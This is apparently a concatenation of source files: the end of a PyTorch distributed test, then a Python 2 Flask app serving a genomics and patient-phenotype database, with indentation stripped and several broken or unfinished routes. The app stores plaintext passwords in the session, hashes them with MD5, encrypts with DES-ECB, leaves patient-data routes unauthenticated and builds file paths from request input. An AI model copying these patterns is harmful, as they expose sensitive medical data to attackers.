self.assertEqual(output_tensor, torch.zeros(2, 2) + 1)
dist.barrier()
dist.destroy_process_group()
def test_send_recv(self):
dist.Backend.register_backend("dummy", PythonProcessGroupExtensionTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test send
input_tensor = torch.zeros(2, 2)
dist.send(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 1)
# test recv
input_tensor = torch.zeros(2, 2)
dist.recv(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 2)
dist.barrier()
# intentionally not calling into `destroy_process_group` as not all
# user applications would explicitly call it.
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
__init__.py
|
# flask imports
from flask import (Flask, session, g, request, redirect, url_for, abort,
                   render_template, flash, jsonify, send_file,
                   send_from_directory, Response, make_response,
                   stream_with_context)
from flask_session import Session
from flask_compress import Compress
from flask_runner import Runner
from flask_errormail import mail_on_500
from flask_debugtoolbar import DebugToolbarExtension
import sys
import re
import StringIO
import urllib, base64
import numpy as np
from jinja2_extensions import *
import md5
from scipy.stats import chisquare
import math
from Bio import Entrez
from phenotips_python_client import PhenotipsClient
from phenotips_python_client import browser
from bson.json_util import loads
from mongodb import *
# fizz: hpo lookup
import phizz
import itertools
import json
import os
import pymongo
import pysam
import gzip
from parsing import *
import logging
import lookups
import random
import sys
from utils import *
from collections import defaultdict, Counter
from collections import OrderedDict
from werkzeug.contrib.cache import SimpleCache
from multiprocessing import Process
import glob
import sqlite3
import traceback
import time
from functools import wraps
from werkzeug.exceptions import default_exceptions, HTTPException
import pandas
import csv
import time
import StringIO
from urlparse import urlparse
import pickle
#import pdb
# handles live plotting if necessary
import math
import plotly
print plotly.__version__ # version >1.9.4 required
from plotly.graph_objs import Scatter, Layout
# connect to R session
#import pyRserve
import numpy
import subprocess
from flask import Flask, render_template, redirect, url_for, request
from load_individual import load_patient
from Crypto.Cipher import DES
import base64
logging.getLogger().addHandler(logging.StreamHandler())
logging.getLogger().setLevel(logging.INFO)
#ADMINISTRATORS = ( 'n.pontikos@ucl.ac.uk',)
#app = Flask(__name__)
#mail_on_500(app, ADMINISTRATORS)
#Compress(app)
#app.config['COMPRESS_DEBUG'] = True
##cache = SimpleCache(default_timeout=60*60*24)
ADMINISTRATORS = ( 'n.pontikos@ucl.ac.uk',)
app = Flask(__name__)
mail_on_500(app, ADMINISTRATORS)
Compress(app)
app.config['COMPRESS_DEBUG'] = True
cache = SimpleCache(default_timeout=60*60*24)
REGION_LIMIT = 1E5
EXON_PADDING = 50
# Load default config and override config from an environment variable
#app.config.from_pyfile('uclex.cfg')
app.config.from_pyfile('uclex-old.cfg')
# Check Configuration section for more details
#SESSION_TYPE = 'null'
SESSION_TYPE = 'mongodb'
#SESSION_USE_SIGNER=True
app.config.from_object(__name__)
sess=Session()
sess.init_app(app)
def check_auth(username, password):
"""
This function is called to check if a username / password combination is valid.
Will try to connect to phenotips instance.
"""
print username
conn=PhenotipsClient()
response=conn.get_patient(auth='%s:%s' % (username, password,),number=1)
if response:
session['password2'] = password
password=md5.new(password).hexdigest()
session['user'] = username
session['password'] = password
return True
else: return False
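# NOTE: everything below in this function is unreachable -- the if/else above
# always returns before the database-backed check is attempted.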
# check that user name and hash of password exist in database
db_users=get_db('users')
# setting a session key for pubmedBatch to save result
session['password2'] = password
password=md5.new(password).hexdigest()
session['user'] = username
session['password'] = password
r=db_users.users.find_one({'user':username})
if r is None:
return False
elif md5.new(r['password']).hexdigest() == md5.new(password).hexdigest():
print('LOGIN', session['user'])
return True
else:
return False
def authenticate():
"""Sends a 401 response that enables basic auth"""
return Response( 'Could not verify your access level for that URL.\n' 'You have to login with proper credentials', 401, {'WWW-Authenticate': 'Basic realm="Login Required"'})
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
if session:
if 'user' in session and 'password2' in session and check_auth(session['user'],session['password2']):
return f(*args, **kwargs)
else:
return redirect('https://uclex.cs.ucl.ac.uk/login')
#return render_template('login.html', error='Invalid Credentials. Please try again.')
print 'method', request.method
error=None
if request.method == 'POST':
username=request.form['username']
password=request.form['password']
if check_auth(username,password):
return f(*args, **kwargs)
else:
# doesn't redirect
#return render_template('login.html', error='Invalid Credentials. Please try again.')
#return login()
return redirect('https://uclex.cs.ucl.ac.uk/login')
return decorated
#
@app.route('/login', methods=['GET','POST'])
def login():
print request.method
error = None
print 'login', request.method
print request.form
if request.method == 'POST':
username=request.form['username']
password=request.form['password']
if not check_auth(username,password):
error = 'Invalid Credentials. Please try again.'
else:
return redirect('https://uclex.cs.ucl.ac.uk')
return render_template('login.html', error=error)
#
@app.route('/logout')
def logout():
try:
print session
del session['user']
del session['password']
del session['password2']
del session
except NameError:
return redirect('https://uclex.cs.ucl.ac.uk/login')
return render_template('login.html', error="You have been logged out")
@app.route('/')
@requires_auth
def homepage():
cache_key = 't-homepage'
#t = cache.get(cache_key)
#if t: return t
db=get_db()
total_variants=db.variants.count()
print('total_variants',total_variants,)
total_patients=db.patients.count()
print('total_patients',total_patients,)
male_patients=db.patients.find( {'sex':'M'}).count()
print('male_patients',male_patients,)
female_patients=db.patients.find( {'sex':'F'}).count()
print('female_patients',female_patients,)
unknown_patients=db.patients.find( {'sex':'U'}).count()
dotfile='static/dot/ENSG00000122375_hom_comp.dot'
DOT=file(dotfile,'r').read().replace('\n','\\n')
# replace single quote
DOT=re.sub("'", ''', DOT)
#fontsize=7
# change fontsize to 7
#DOT=re.sub(r'fontsize="\d+"', 'fontsize="%d"' % fontsize, DOT)
exac_variants=db.variants.find({'in_exac':True}).count()
print('exac_variants',exac_variants,)
pass_variants=db.variants.find({'filter':'PASS'}).count()
print('pass_variants',pass_variants,)
pass_exac_variants=db.variants.find({'in_exac':True,'filter':'PASS'}).count()
print('pass_exac_variants',pass_exac_variants,)
pass_exac_variants=db.variants.find({'in_exac':True,'filter':'PASS'}).count()
nonexac_variants=db.variants.find({'in_exac':False}).count()
pass_nonexac_variants=db.variants.find({'in_exac':False,'filter':'PASS'}).count()
nonpass_variants=(total_variants-pass_variants)
nonpass_nonexac_variants=nonexac_variants-pass_nonexac_variants
#labels = 'PASS', 'non-PASS',
#sizes =[100*pass_variants/float(total_variants),100*(nonpass_variants)/float(total_variants)]
#print(sizes)
#colors = ['yellowgreen', 'red']
#explode = (0.1, 0)
#plt.figure(figsize=(5,5))
#plt.margins(1, 1)
#plt.pie(sizes, explode=explode, labels=labels, colors=colors, autopct='%1.1f%%', shadow=True, startangle=90)
## Set aspect ratio to be equal so that pie is drawn as a circle.
#plt.axis('equal')
#plt.axis('off')
#plt.show()
# word cloud
#from os import path
#from wordcloud import WordCloud
#text = 'HPO HPO HPO HPO all day'
## Read the whole text.
## take relative word frequencies into account, lower max_font_size
#wordcloud = WordCloud().generate(text)
#plt.figure()
#plt.imshow(wordcloud)
#plt.axis("off")
#plt.show()
#imgdata = StringIO.StringIO()
#plt.savefig(imgdata, format='svg')
#imgdata.seek(0) # rewind the data
#import urllib
#image=urllib.quote(base64.b64encode(imgdata.buf))
#image=imgdata.buf
#image = '<svg' + image.split('<svg')[1]
t = render_template('homepage.html',
total_patients=total_patients,
male_patients=male_patients,
female_patients=female_patients,
unknown_patients=unknown_patients,
DOT=DOT,
total_variants=total_variants,
exac_variants=exac_variants,
pass_variants=pass_variants,
pass_exac_variants=pass_exac_variants,
pass_nonexac_variants=pass_nonexac_variants,
#image=image.decode('utf8'))
image="")
#cache.set(cache_key, t)
return t
@app.route('/set/<query>')
def set(query):
value = query
session['key'] = value
return value
@app.route('/get/')
def get():
return session.get('key', 'not set')
def get_db(dbname=None):
"""
Opens a new database connection if there is none yet for the
current application context.
"""
if dbname is None: dbname=app.config['DB_NAME']
if not hasattr(g, 'db_conn'):
g.db_conn=dict()
g.db_conn[dbname] = connect_db(dbname)
elif dbname not in g.db_conn:
g.db_conn[dbname] = connect_db(dbname)
return g.db_conn[dbname]
def get_R_session():
if not hasattr(g, 'R_session'): g.R_session=pyRserve.connect()
return g.R_session
def get_hpo_graph():
"""
"""
if not hasattr(g, 'hpo_graph'):
from hpo_similarity.ontology import Ontology
from hpo_similarity.similarity import CalculateSimilarity
ontology=Ontology(app.config['HPO_OBO'])
g.hpo_graph=ontology.get_graph()
return g.hpo_graph
def connect_db(dbname=None):
"""
Connects to the specific database.
"""
client = pymongo.MongoClient(host=app.config['DB_HOST'], port=app.config['DB_PORT'])
print(client)
if not dbname: dbname=app.config['DB_NAME']
print(dbname)
return client[dbname]
def parse_tabix_file_subset(tabix_filenames, subset_i, subset_n, record_parser):
"""
Returns a generator of parsed record objects (as returned by record_parser) for the i'th out n subset of records
across all the given tabix_file(s). The records are split by files and contigs within files, with 1/n of all contigs
from all files being assigned to this the i'th subset.
Args:
tabix_filenames: a list of one or more tabix-indexed files. These will be opened using pysam.Tabixfile
subset_i: zero-based number
subset_n: total number of subsets
record_parser: a function that takes a file-like object and returns a generator of parsed records
"""
start_time = time.time()
print(tabix_filenames)
open_tabix_files = [pysam.Tabixfile(tabix_filename) for tabix_filename in tabix_filenames]
tabix_file_contig_pairs = [(tabix_file, contig) for tabix_file in open_tabix_files for contig in tabix_file.contigs]
# get every n'th tabix_file/contig pair
tabix_file_contig_subset = tabix_file_contig_pairs[subset_i : : subset_n]
short_filenames = ", ".join(map(os.path.basename, tabix_filenames))
print(short_filenames)
num_file_contig_pairs = len(tabix_file_contig_subset)
print(("Loading subset %(subset_i)s of %(subset_n)s total: %(num_file_contig_pairs)s contigs from %(short_filenames)s") % locals())
counter = 0
for tabix_file, contig in tabix_file_contig_subset:
header_iterator = tabix_file.header
records_iterator = tabix_file.fetch(contig, 0, 10**9, multiple_iterators=True)
for parsed_record in record_parser(itertools.chain(header_iterator, records_iterator)):
counter += 1
yield parsed_record
if counter % 100000 == 0:
seconds_elapsed = int(time.time()-start_time)
print(("Loaded %(counter)s records from subset %(subset_i)s of %(subset_n)s from %(short_filenames)s " "(%(seconds_elapsed)s seconds)") % locals())
print("Finished loading subset %(subset_i)s from %(short_filenames)s (%(counter)s records)" % locals())
def create_cache():
"""
This is essentially a compile step that generates all cached resources.
Creates files like autocomplete_entries.txt
Should be run on every redeploy.
"""
# create autocomplete_entries.txt
autocomplete_strings = []
for gene in get_db().genes.find():
autocomplete_strings.append(gene['gene_name'])
if 'other_names' in gene:
autocomplete_strings.extend(gene['other_names'])
f = open(os.path.join(app.config['UCLEX_FILES_DIRECTORY'],'autocomplete_strings.txt'), 'w')
for s in sorted(autocomplete_strings):
f.write(s+'\n')
f.close()
# create static gene pages for genes in
if not os.path.exists(app.config['GENE_CACHE_DIR']): os.makedirs(app.config['GENE_CACHE_DIR'])
# get list of genes ordered by num_variants
for gene_id in app.config['GENES_TO_CACHE']:
try:
page_content = get_gene_page_content(gene_id)
except Exception as e:
print e
continue
f = open(os.path.join(app.config['GENE_CACHE_DIR'], '{}.html'.format(gene_id)), 'w')
f.write(page_content)
f.close()
def precalculate_metrics():
db = get_db()
print 'Reading %s variants...' % db.variants.count()
metrics = defaultdict(list)
binned_metrics = defaultdict(list)
progress = 0
start_time = time.time()
for variant in db.variants.find(fields=['quality_metrics', 'site_quality', 'allele_num', 'allele_count']):
for metric, value in variant['quality_metrics'].iteritems():
metrics[metric].append(float(value))
qual = float(variant['site_quality'])
metrics['site_quality'].append(qual)
if variant['allele_num'] == 0: continue
if variant['allele_count'] == 1:
binned_metrics['singleton'].append(qual)
elif variant['allele_count'] == 2:
binned_metrics['doubleton'].append(qual)
else:
for af in AF_BUCKETS:
if float(variant['allele_count'])/variant['allele_num'] < af:
binned_metrics[af].append(qual)
break
progress += 1
if not progress % 100000:
print 'Read %s variants. Took %s seconds' % (progress, int(time.time() - start_time))
print 'Done reading variants. Dropping metrics database... '
db.metrics.drop()
print 'Dropped metrics database. Calculating metrics...'
for metric in metrics:
bin_range = None
data = map(numpy.log, metrics[metric]) if metric == 'DP' else metrics[metric]
if metric == 'FS':
bin_range = (0, 20)
elif metric == 'VQSLOD':
bin_range = (-20, 20)
elif metric == 'InbreedingCoeff':
bin_range = (0, 1)
if bin_range is not None:
data = [x if (x > bin_range[0]) else bin_range[0] for x in data]
data = [x if (x < bin_range[1]) else bin_range[1] for x in data]
hist = numpy.histogram(data, bins=40, range=bin_range)
edges = hist[1]
# mids = [(edges[i]+edges[i+1])/2 for i in range(len(edges)-1)]
lefts = [edges[i] for i in range(len(edges)-1)]
db.metrics.insert({
'metric': metric,
'mids': lefts,
'hist': list(hist[0])
})
for metric in binned_metrics:
hist = numpy.histogram(map(numpy.log, binned_metrics[metric]), bins=40)
edges = hist[1]
mids = [(edges[i]+edges[i+1])/2 for i in range(len(edges)-1)]
db.metrics.insert({
'metric': 'binned_%s' % metric,
'mids': mids,
'hist': list(hist[0])
})
db.metrics.ensure_index('metric')
print 'Done pre-calculating metrics!'
def response(POS, REF, ALT, index, geno, chrom, pos):
homozygous_genotype='/'.join([str(index),str(index)])
heterozygous_genotype='/'.join(['0',str(index)])
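# e.g. for the second ALT allele (index=2) these are '2/2' and '0/2' respectively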
variant=dict()
variant['pos']=POS
variant['ref']=REF
variant['alt']=ALT
variant['hom_samples']=[h for h in geno if geno[h].split(':')[0]==homozygous_genotype][0:100]
variant['HOM_COUNT']=len(variant['hom_samples'])
variant['het_samples']=[h for h in geno if geno[h].split(':')[0]==heterozygous_genotype][0:100]
variant['HET_COUNT']=len(variant['het_samples'])
variant['wt_samples']=[h for h in geno if geno[h].split(':')[0]=='0/0'][1:100]
variant['WT_COUNT']=len([h for h in geno if geno[h].split(':')[0]=='0/0'])
variant['MISS_COUNT']=len([h for h in geno if geno[h].split(':')[0]=='./.'])
variant['allele_num']= 2*(variant['HOM_COUNT'] + variant['HET_COUNT']+variant['WT_COUNT'])
variant['allele_count']=2*variant['HOM_COUNT'] + variant['HET_COUNT']
#variant['site_quality'] = variant['QUAL']
#variant['filter'] = variant['FILTER']
if variant['WT_COUNT']==0:
variant['allele_freq'] = None
else:
variant['allele_freq'] = float(variant['HET_COUNT']+2*variant['HOM_COUNT']) / float(2*variant['WT_COUNT'])
var2='-'.join([str(chrom),str(pos),variant['ref'],variant['alt']])
variant['variant_id']=var2
samples=variant['het_samples']+variant['hom_samples']
print(samples)
variant['hpo']=[p for p in get_db('patients').patients.find({'external_id':{'$in':samples}},{'_id':0,'features':1,'external_id':1})]
return(jsonify(result=variant))
#import matplotlib
#matplotlib.use('Agg')
#import matplotlib.pyplot as plt
#from uclex_base import *
#from uclex_gene import *
#def get_db(dbname=None):
# """
# Opens a new database connection if there is none yet for the
# current application context.
# """
# if dbname is None: dbname=app.config['DB_NAME']
# if not hasattr(g, 'db_conn'):
# g.db_conn=dict()
# g.db_conn[dbname] = connect_db(dbname)
# elif dbname not in g.db_conn:
# g.db_conn[dbname] = connect_db(dbname)
# return g.db_conn[dbname]
@app.route('/autocomplete/<query>')
def awesome_autocomplete(query):
if not hasattr(g, 'autocomplete_strings'): g.autocomplete_strings = [s.strip() for s in open(os.path.join(app.config['UCLEX_FILES_DIRECTORY'], 'autocomplete_strings.txt'))]
suggestions = lookups.get_awesomebar_suggestions(g, query)
return Response(json.dumps([{'value': s} for s in suggestions]), mimetype='application/json')
@app.route('/awesome')
def awesome():
db = get_db()
query = str(request.args.get('query'))
#for n in dir(request): print(n, getattr(request,n))
#print(request.HTTP_REFERER)
print(request.referrer)
if request.referrer:
referrer=request.referrer
u = urlparse(referrer)
referrer='%s://%s' % (u.scheme,u.hostname,)
if u.port: referrer='%s:%s' % (referrer,u.port,)
else:
referrer=''
#u.netloc
print(referrer)
datatype, identifier = lookups.get_awesomebar_result(db, query)
print "Searched for %s: %s" % (datatype, identifier)
if datatype == 'gene':
return redirect('{}/gene/{}'.format(referrer,identifier))
elif datatype == 'transcript':
return redirect('{}/transcript/{}'.format(referrer,identifier))
elif datatype == 'variant':
return redirect('{}/variant/{}'.format(referrer,identifier))
elif datatype == 'region':
return redirect('{}/region/{}'.format(referrer,identifier))
elif datatype == 'dbsnp_variant_set':
return redirect('{}/dbsnp/{}'.format(referrer,identifier))
elif datatype == 'hpo':
return redirect('{}/hpo/{}'.format(referrer,identifier))
elif datatype == 'mim':
return redirect('{}/mim/{}'.format(referrer,identifier))
elif datatype == 'error':
return redirect('{}/error/{}'.format(referrer,identifier))
elif datatype == 'not_found':
return redirect('{}/not_found/{}'.format(referrer,identifier))
else:
raise Exception
@app.route('/patient/<patient_str>')
def get_patient(patient_str):
pass
# AJAX
# Not finished
@app.route('/chisqu/<variant_str>',methods=['GET','POST'])
def chisq(variant_str):
if request.method=='POST':
hpo_patients=request.form['patients'].strip().split(',')
else:
hpo_patients=request.args.get('patients').strip().split(',')
print('hpo_patients',hpo_patients,)
variant_str=str(variant_str).strip().replace('_','-')
chrom, pos, ref, alt = variant_str.split('-')
tb=pysam.TabixFile('/slms/UGI/vm_exports/vyp/phenotips/uclex_files/current/chr%s.vcf.gz' % chrom,)
region=str('%s:%s-%s'%(chrom, pos, int(pos),))
headers=[h for h in tb.header]
headers=(headers[len(headers)-1]).strip().split('\t')
print(region)
records=tb.fetch(region=region)
geno=dict(zip(headers, [r.split('\t') for r in records][0]))
samples=[h for h in geno if geno[h].split(':')[0]=='0/1' or geno[h].split(':')[0]=='1/1']
#d=csv.DictReader(file('/data/uclex_files/UCLexInfo/uclex-samples.csv','r'),delimiter=',')
#headers=file('/slms/UGI/vm_exports/vyp/phenotips/uclex_files/current/headers.txt','r').read().strip().replace('#','').split('\t')
#d=csv.DictReader(file('/data/UCLpheno/uclex-hpo.txt','r'),delimiter='\t')
res=jsonify(result=hpo_patients)
return res
def stream_template(template_name, **context):
app.update_template_context(context)
t = app.jinja_env.get_template(template_name)
rv = t.stream(context)
rv.enable_buffering(5)
return rv
@app.route('/my-large-page.html')
def render_large_template():
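# NOTE: iter_all_rows is not defined in this file; this route follows the
# streaming-template example from the Flask docs and appears to be a placeholder.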
rows = iter_all_rows()
return Response(stream_template('the_template.html', rows=rows))
@app.route('/stream')
def streamed_response():
def generate():
yield 'Hello '
yield request.args['name']
yield '!'
return Response(stream_with_context(generate()))
def generate_patient_table():
def get_variants(variant_ids):
for vid in db.variants.find({'variant_id':{'$in':variant_ids}}):
yield
'''
serve the Vincent annotated csv files
'''
@app.route('/download/send_csv', methods=['GET','POST'])
@requires_auth
def download_csv():
conn=PhenotipsClient()
p_id = request.args.get('p_id')
auth='%s:%s' % (session['user'],session['password2'],)
p=conn.get_patient(eid=p_id,auth=auth)
if not p: return 'Sorry you are not permitted to see this patient, please get in touch with us to access this information.'
folder = request.args.get('folder')
path = '/slms/UGI/vm_exports/vyp/phenotips/DROPBOX/'
csv_file = os.path.join(path,folder, p_id + '.csv')
filename = folder+'_'+p_id+'.csv'
if not os.path.isfile(csv_file):
return 'Oops, file not found!'
return send_file(csv_file,
mimetype='text/csv',
attachment_filename=filename,
as_attachment=True)
def encrypt(s):
obj=DES.new(session['password'][:8], DES.MODE_ECB)
s=s+(8-(len(s) % 8))*' '
s=obj.encrypt(s)
s=base64.urlsafe_b64encode(s)
return s
def decrypt(s):
obj=DES.new(session['password'][:8], DES.MODE_ECB)
s=base64.urlsafe_b64decode(str(s))
s=obj.decrypt(s)
s=s.replace(' ','')
return s
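# Round trip: decrypt(encrypt(s)) == s provided s contains no spaces, since the
# space padding added by encrypt (and any other spaces) is stripped by the
# replace(' ','') above. The DES key is the first 8 characters of the md5 hex
# digest stored in session['password'] by check_auth.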
# shows each individual,
# all_individuals
@app.route('/individuals')
@requires_auth
def individuals_page():
page=int(request.args.get('page',0))
number=int(request.args.get('number',500))
hpo_db=get_db('hpo')
def f(p):
print p['external_id']
p['features']=[f for f in p.get('features',[]) if f['observed']=='yes']
if 'solved' in p:
if 'gene' in p['solved']:
p['solved']=[p['solved']['gene']]
else:
p['solved']=[]
else: p['solved']=[]
if 'genes' in p: p['genes']=[x['gene'] for x in p['genes'] if 'gene' in x]
else: p['genes']=[]
p['genes']=list(frozenset(p['genes']+p['solved']))
p2=get_db().patients.find_one({'external_id':p['external_id']},{'homozygous_variants_count':1,'compound_hets_count':1, 'rare_variants_count':1})
if not p2: return p
p['rare_homozygous_variants_count']=p2.get('homozygous_variants_count','')
p['rare_compound_hets_count']=p2.get('compound_hets_count','')
p['rare_variants_count']=p2.get('rare_variants_count','')
#p['all_variants_count']=get_db().patients.find_one({'external_id':p['external_id']},{'_id':0,'all_variants_count':1})['all_variants_count']
#db.cache.find_one({"key" : "%s_blindness,macula,macular,retina,retinal,retinitis,stargardt_" % })
return p
conn=PhenotipsClient()
auth='%s:%s' % (session['user'],session['password2'],)
patients=conn.get_patient(auth=auth,start=page*number,number=number).get('patientSummaries',[])
eids=[p['eid'] for p in patients]
print(eids)
patients=get_db('patients').patients.find({'external_id':{'$in':eids}})
#patients=get_db('patients').patients.find({'external_id':re.compile('^IRDC')},{'pubmedBatch':0})
individuals=[f(p) for p in patients if 'external_id' in p]
# family_history":{"consanguinity":true}
#if session['user']=='demo': for ind in individuals: ind['external_id']=encrypt(ind['external_id'])
return render_template('individuals_page.html',individuals=individuals)
@app.route('/research_pubmed', methods=['POST'])
def research_pubmed():
# use new search terms to update the individual-pubmedbatch table
patient_id = request.form['p_id']
search_term = request.form['OR']
# update patient pubmed result status as running (1)
db=get_db()
db.patients.update({'external_id':patient_id},{'$set': {'pubmedbatch.status': 1}})
# do the actual update
#exit_status = subprocess.call(['python','individual_pubmedBatch.py', '-p', patient_id, '--OR', search_term])
exit_status=0
# reset update status to 0
db.patients.update({'external_id':patient_id},{'$set': {'pubmedbatch.status': 0}})
return str(exit_status)
@app.route('/hpo')
def hpo_main():
# HPO summary page
# major groups, borrowed from phenotips
major_groups = {'GROWTH PARAMETERS':['HP:0000256','HP:0000252','HP:0000098','HP:0004322','HP:0004324','HP:0004325','HP:0001508','HP:0001528'],'CRANIOFACIAL':['HP:0001363','HP:0000204','HP:0000175','HP:0001999'],'EYE DEFECTS':['HP:0000505','HP:0000481','HP:0000589','HP:0000593','HP:0000518','HP:0000479','HP:0000587','HP:0000568','HP:0000639','HP:0000486','HP:0000601','HP:0000316'],'EAR DEFECTS':['HP:0000407','HP:0000405','HP:0004467','HP:0000384','HP:0000356','HP:0000359'],'CUTANEOUS':['HP:0000953','HP:0001010','HP:0005306','HP:0011276'],'CARDIOVASCULAR':['HP:0001631','HP:0001629','HP:0001674','HP:0001680','HP:0001636','HP:0001638','HP:0011675'],'RESPIRATORY':['HP:0000776','HP:0002088'],'MUSCULOSKELETAL':['HP:0002652','HP:0002659','HP:0009816','HP:0009824','HP:0100490','HP:0001836','HP:0006101','HP:0001770','HP:0100258','HP:0100259','HP:0001180','HP:0001849','HP:0002650','HP:0000925','HP:0001371','HP:0001762'],'GASTROINTESTINAL':['HP:0002032','HP:0002575','HP:0001543','HP:0001539','HP:0002251','HP:0001396','HP:0002910','HP:0001738','HP:0000819'],'GENITOURINARY':['HP:0000107','HP:0000085','HP:0000069','HP:0000795','HP:0000062','HP:0000047','HP:0000028'],'BEHAVIOR, COGNITION AND DEVELOPMENT':['HP:0001263','HP:0010862','HP:0002194','HP:0000750','HP:0001328','HP:0001256','HP:0002342','HP:0010864','HP:0007018','HP:0000717','HP:0000708'],'NEUROLOGICAL':['HP:0001290','HP:0001250','HP:0001251','HP:0001332','HP:0002072','HP:0001257','HP:0010301','HP:0002011']}
hpo_freq = lookups.get_hpo_size_freq('hpo_freq.tsv')
return str(hpo_freq)
@app.route('/hpo/<hpo_id>')
def hpo_page(hpo_id):
patients_db=get_db('patients')
db=get_db()
hpo_db=get_db('hpo')
patients_db=get_db('patients')
#patients=[p for p in patients_db.patients.find( { 'features': {'$elemMatch':{'id':str(hpo_id)}} } )]
print(hpo_id)
if not hpo_id.startswith('HP:'):
hpo_id=hpo_db.hpo.find_one({'name':hpo_id})['id'][0]
print(hpo_id)
hpo_name=hpo_db.hpo.find_one({'id':hpo_id})['name'][0]
print('HPO ANCESTORS')
hpo_ancestors=lookups.get_hpo_ancestors(hpo_db,hpo_id)
print(len(hpo_ancestors))
print([h['name'] for h in hpo_ancestors])
#print(len([v['VARIANT_ID'] for v in db.variants.find({'HET' : { '$in': patient_ids }})]))
#print(len([v['VARIANT_ID'] for v in db.variants.find({'HOM' : { '$in': patient_ids }})]))
#r=patients_db.hpo.find_one({'hp_id':hpo_id})
#if r: external_ids=r['external_ids']
#else: external_ids=[]
genes=[lookups.get_gene_by_name(db, r['Gene-Name']) for r in hpo_db.hpo_gene.find({'HPO-ID':hpo_id})]
print('num genes', len(genes))
#for r in hpo_db.hpo_pubmed.find({'hpoid':hpo_id}): print(r)
#pmids=[r['pmid'] for r in hpo_db.hpo_pubmed.find({'hpoid':hpo_id})]
patients=lookups.get_hpo_patients(hpo_db,patients_db,hpo_id)
print('num patients', len(patients))
pmids=[]
## only return common variants if there are many individuals
##rsession.voidEval('common_variants <- common.variants')
## private variants (not seen in others in the cohort)
##rsession.voidEval('common_variants <- common.variants')
#variants=rsession.r.private_variants(hpo_patients)
#if type(variants) is str:
#variants=[variants]
#else:
#variants=variants.tolist()
#print('num variants',len(variants),)
#variants=[db.variants.find_one({'variant_id':v.replace('_','-')}) for v in variants[:100]]
#[variant for variant in lookups.get_variants_in_gene(db, g['gene_id'])]
#if variant['major_consequence']!='stop_gained': continue
#print(variant)
#break
#print( lookups.get_variants_in_gene(db, 'CNNM4') )
#vcf_reader = pysam.VariantFile('/slms/UGI/vm_exports/vyp/phenotips/uclex_files/current/chr%s.vcf.gz' % '22')
#for record in vcf_reader:
#for s in external_ids:
#r=record.samples[s]
#if 'GT' in r: print(r['GT'])
return render_template('phenotype.html',hpo_id=hpo_id,hpo_name=hpo_name,individuals=[str(p['external_id']) for p in patients],genes=genes,pmids=pmids,variants=[])
# AJAX
# fetch patients with hpo term
@app.route('/fetch_hpo',methods=['GET','POST'])
def fetch_hpo():
if request.method=='POST':
hpo_ids=request.form['hpo_ids'].strip().split(',')
else:
hpo_ids=request.args.get('hpo_ids').strip().split(',')
hpo_id=hpo_ids[0]
print('HPO',hpo_id)
hpo_db=get_db('hpo')
patients_db=get_db('patients')
hpo_patients=[p['external_id'] for p in lookups.get_hpo_patients(hpo_db,patients_db,hpo_id)]
print('num patients',len(hpo_patients))
res=jsonify(result=hpo_patients)
return res
# AJAX
# fetch variants private to these patients
# i.e. variants which are seen only in these patients and in no one else
@app.route('/fetch_private_variants',methods=['GET','POST'])
def fetch_private_variants():
if request.method=='POST':
hpo_patients=request.form['patients'].strip().split(',')
else:
hpo_patients=request.args.get('patients').strip().split(',')
print('hpo_patients',hpo_patients,)
db=get_db()
if len(hpo_patients)==1:
        variants=db.variants.find({'PRIVATE_MUT':hpo_patients}, fields={'_id': False})
else:
#rsession=get_R_session()
variants=rsession.r.private_variants(hpo_patients)
#variants=[]
print('private variants', variants)
    if type(variants) is str:
        variants=[variants]
    elif hasattr(variants,'tolist'):
        variants=variants.tolist()
    else:
        # pymongo cursors have no tolist(); materialise them into a plain list
        variants=list(variants)
print('num of private variants',len(variants),)
res=jsonify(result=variants)
return res
# AJAX
# fetch variants common to these patients
# i.e. variants which are seen in all of these patients
@app.route('/fetch_common_variants',methods=['GET','POST'])
def fetch_common_variants():
if request.method=='POST':
hpo_patients=request.form['patients'].strip().split(',')
else:
hpo_patients=request.args.get('patients').strip().split(',')
print('hpo_patients',hpo_patients,)
#rsession=get_R_session()
#variants=rsession.r.common_variants(hpo_patients)
variants=[]
print('common variants', variants)
    if type(variants) is str:
        variants=[variants]
    elif hasattr(variants,'tolist'):
        variants=variants.tolist()
print('num of common variants',len(variants),)
res=jsonify(result=variants)
return res
# AJAX
# fetches variant record from db
@app.route('/fetch_variant',methods=['GET','POST'])
def fetch_variant():
if request.method=='POST':
variants=request.form['variants'].strip().split(',')
else:
variants=request.args.get('variants').strip().split(',')
db=get_db()
req_len=len(variants)
variant_ids=map(lambda x: x.replace('_','-'),variants)
variants=[v for v in db.variants.find({'variant_id':{'$in':variant_ids}}, fields={'_id': False})]
ans_len=len(variants)
print(req_len==ans_len)
res=jsonify(result=variants)
return res
# AJAX
# fetches information from db
@app.route('/variant_count',methods=['GET','POST'])
def variant_count():
if request.method=='POST':
external_id=request.form['external_id'].strip()
else:
external_id=request.args.get('external_id').strip()
#rsession=get_R_session()
#res=jsonify(result={'variant_count':rsession.eval('sum(as.logical(variants[["%s"]]))' % external_id) , 'external_id':external_id})
#return res
# AJAX
# fetches information from db
@app.route('/private_variant_count',methods=['GET','POST'])
def private_variant_count():
if request.method=='POST':
external_id=request.form['external_id'].strip()
else:
external_id=request.args.get('external_id').strip()
db=get_db('patients')
p=db.patients.find_one({'external_id':external_id})
if 'PRIVATE_MUT' not in p: private_variant_count=0
else: private_variant_count=len(p['PRIVATE_MUT'])
res=jsonify(result={'variant_count': private_variant_count, 'external_id':external_id})
return res
@app.route('/mim/<mim_id>')
def mim_page(mim_id):
db=get_db('patients')
print(str(mim_id))
    patients=[p for p in db.patients.find( { 'features': {'$elemMatch':{'id':str(mim_id)}} } )]
    patient_ids=[p['external_id'] for p in patients]
    print(phizz.query_disease([mim_id]))
print(len([v['VARIANT_ID'] for v in db.variants.find({'HET' : { '$in': patient_ids }})]))
print(len([v['VARIANT_ID'] for v in db.variants.find({'HOM' : { '$in': patient_ids }})]))
return render_template('test.html')
@app.route('/patient/<patient_id>')
def patient_page(patient_id):
db=get_db()
patients=[p for p in db.patients.find({'external_id': str(patient_id)})]
print(patients)
return None
@app.route('/Exomiser/<path:path>')
